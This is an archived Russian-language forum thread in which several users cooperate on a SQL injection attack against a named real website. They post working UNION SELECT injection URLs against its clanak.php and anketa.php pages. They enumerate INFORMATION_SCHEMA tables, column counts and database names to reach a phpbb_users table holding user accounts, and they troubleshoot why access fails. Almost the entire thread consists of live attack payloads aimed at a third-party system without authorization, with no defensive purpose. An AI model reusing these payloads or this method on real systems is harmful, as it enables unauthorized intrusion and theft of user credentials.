PDA

Просмотр полной версии : sql выдает ошибку


m0use
29.08.2007, 17:18
_http://www.zdravlje.hr/clanak.php?id=m-72+union+select+1,table_name,3+from+INFORMATION_SC HEMA.TABLES/*

есть такой скуль. там выводит таблицу phpbb, и так я знаю впринципе что он там есть, но приобращении.
http://www.zdravlje.hr/clanak.php?id=m-72+union+select+1,2,3+from+phpbb/*
или же
_http://www.zdravlje.hr/anketa.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11+from+phpbb/*
выдает ошибку

freddi
29.08.2007, 17:23
13 столбцов.

m0use
29.08.2007, 17:29
Где именно что то я не очень понял

freddi
29.08.2007, 17:35
http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,table_name ,12,13+from+INFORMATION_SCHEMA.TABLES+limit+7,1/*
гугл, антибоян

m0use
29.08.2007, 17:42
Это я и так знал... я не про это спрашивал... при обращении phpbb_users ошибку выдает

Joker-jar
29.08.2007, 17:52
Ищи, в какой БД таблица лежит

NOmeR1
29.08.2007, 17:55
http://www.zdravlje.hr/anketa.php?id=-1+union+select+1,2,3,table_name,5,6,7,8,9,10,11+fr om+INFORMATION_SCHEMA.TABLES+limit+16,1/*

ТС, вообщето:
http://www.zdravlje.hr/anketa.php?id=-1+union+select+1,2,3,имя_столбца,5,6,7,8 ,9,10,11+from+имя_таблицы/*

А не просто имя_таблицы

Joker-jar
29.08.2007, 17:59
http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,table_name ,12,13+from+information_schema.tables+where+table_ name=char(0x50,0x48,0x50,0x42,0x42,0x5f,0x55,0x53, 0x45,0x52,0x53)/*
--> phpbb_users

http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,table_sche ma,12,13+from+information_schema.tables+where+tabl e_name=char(0x50,0x48,0x50,0x42,0x42,0x5f,0x55,0x5 3,0x45,0x52,0x53)/*
--> beracivi

Однако,

http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+f rom+beracivi.phpbb_users/*

Не катит... :(

[Raz0r]
29.08.2007, 18:04
Видимо текущему MySQL юзеру запрещен доступ к БД beracivi

Grey
29.08.2007, 18:19
http://www.zdravlje.hr/clanak.php?id=-12909+union+select+concat(table_schema,char(46),ta ble_name),2,3,4,5,6,7,8,9,10,11,12,13+from+INFORMA TION_SCHEMA.TABLES+where+table_name=0x70687062625f 7573657273+limit+22,1/*

Там 22 Базы Данных содержат таблицу phpbb_users и далеко не факт что БД, используемая этим сайтом содержит эту таблицу. На просмотр БД других сайтов у этого пользователя прав не хватает.